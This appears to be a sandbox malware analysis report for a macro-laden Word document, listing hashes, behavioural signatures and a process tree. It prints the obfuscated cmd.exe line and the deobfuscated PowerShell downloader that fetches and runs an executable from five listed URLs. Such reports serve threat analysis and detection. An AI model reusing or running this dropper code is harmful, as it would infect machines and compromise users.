Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    28/05/2024, 21:08

General

  • Target

    7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc

  • Size

    66KB

  • MD5

    7e6980371f32c621d20998ef8e211bac

  • SHA1

    593532859a14a3cd2f46eba73f5398641544d551

  • SHA256

    6ccd4c745fb1d6d9e1629b3eb80fc7e8286c902e3629f59a3677d3b9375497e0

  • SHA512

    5a328991d18a379fc5606b757cd7c9c3da2500bc4ae7ac0d33401b1bb0d51ecbff2cb02adf5b4239807a1460b58dee4127e79383cd93724d708da797e60b1364

  • SSDEEP

    768:BpJcaUitGAlmrJpmxlzC+w99NBs+1owTRj5EnAYspPZiFfqPd:BptJlmrJpmxlRw99NBs+awly9spPZO

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://laschuk.com.br/C7f65h8p

exe.dropper

http://jobarba.com/wp-content/nY7NWG7z

exe.dropper

http://familiekoning.net/YT9gzKUs

exe.dropper

http://www.ultigamer.com/wp-admin/includes/OCklr3Q

exe.dropper

http://fluorescent.cc/ttQoKkJ4sC

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e6980371f32c621d20998ef8e211bac_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1632
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3060
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V^:/C"^se^t ^3^s^H= ^ ^ ^ ^ ^ }^}{hctac}^;^kaerb^;q^jV$ ^metI-e^kovn^I^;)^qjV^$ ^,r^YC^$(^eli^Fdaoln^w^o^D.Vn^F^$^{yrt{)^T^wi$^ n^i^ rYC^$(^hc^a^erof^;'^e^xe.^'+^B^d^Y^$+'^\^'+c^ilbu^p^:vn^e$^=^qjV$^;^'8^4^3'^ =^ B^dY$;)'^@'(^t^i^lpS^.'Cs^4Jk^K^oQt^t/cc.^tn^ec^seroulf//^:^p^tt^h^@Q3rl^kCO/^sedulcn^i/n^i^md^a-^pw/^m^oc.re^mag^i^t^l^u^.^w^ww//^:^p^tt^h@^s^UKz^g^9^TY/^ten.gnino^ke^i^li^m^a^f//:^p^tt^h^@z^7^G^WN7^Yn/^tn^etnoc^-pw/^m^oc^.a^br^a^b^o^j//^:ptth^@^p8h5^6f^7C/rb^.m^oc.k^u^hcsal//:^p^tth'^=T^wi$^;tneilC^be^W^.^teN ^tcejb^o-wen^=VnF$ ^ll^e^h^sr^ewo^p&&f^or /^L %^g ^in (^3^9^7^;^-1;^0)^d^o s^et ^K^3^X^e=!^K^3^X^e!!^3^s^H:~%^g,1!&&^if %^g ^l^e^q ^0 c^a^l^l %^K^3^X^e:~^-3^9^8%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $FnV=new-object Net.WebClient;$iwT='http://laschuk.com.br/C7f65h8p@http://jobarba.com/wp-content/nY7NWG7z@http://familiekoning.net/YT9gzKUs@http://www.ultigamer.com/wp-admin/includes/OCklr3Q@http://fluorescent.cc/ttQoKkJ4sC'.Split('@');$YdB = '348';$Vjq=$env:public+'\'+$YdB+'.exe';foreach($CYr in $iwT){try{$FnV.DownloadFile($CYr, $Vjq);Invoke-Item $Vjq;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1548

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      9caa68ecc11a6575ee46ca75d298a31d

      SHA1

      8cd35c4ba8cc56c08ed91826bc1ac26377b97407

      SHA256

      f429f32edbe7435ec2d4d96977bb994caa15b3c8374856e76c34056a6c002b2c

      SHA512

      ca283cab68386cebf77b6be79f0323f878d0b9512145a8ca354f83e97d78d43bcfb19a0d018014322181c3282922b8113bcb5108d7c12652139b0f729d60f69e

    • memory/1632-13-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-9-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-7-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-15-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-17-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-0-0x000000002FE11000-0x000000002FE12000-memory.dmp

      Filesize

      4KB

    • memory/1632-10-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-2-0x000000007152D000-0x0000000071538000-memory.dmp

      Filesize

      44KB

    • memory/1632-6-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-29-0x000000007152D000-0x0000000071538000-memory.dmp

      Filesize

      44KB

    • memory/1632-30-0x00000000005B0000-0x00000000006B0000-memory.dmp

      Filesize

      1024KB

    • memory/1632-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1632-45-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1632-46-0x000000007152D000-0x0000000071538000-memory.dmp

      Filesize

      44KB